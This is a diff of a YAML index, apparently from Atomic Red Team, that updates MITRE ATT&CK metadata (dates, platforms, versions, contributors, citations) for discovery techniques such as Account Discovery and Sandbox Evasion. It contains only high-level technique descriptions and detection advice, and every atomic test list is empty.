       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50035,14 +50727,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -50071,7 +50762,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -50131,7 +50821,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -50150,7 +50840,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -50219,12 +50908,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -50301,40 +50989,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50346,6 +51005,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -50356,8 +51019,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -50367,9 +51036,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50402,7 +51090,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50420,12 +51108,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50433,11 +51120,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50448,7 +51138,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50462,6 +51152,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50481,56 +51175,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50552,19 +51201,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -50635,46 +51326,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -50698,6 +51354,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -50708,9 +51367,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50720,12 +51384,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50768,12 +51459,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50784,28 +51474,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -50838,9 +51531,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -50883,7 +51575,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -50922,13 +51614,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -50969,87 +51659,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
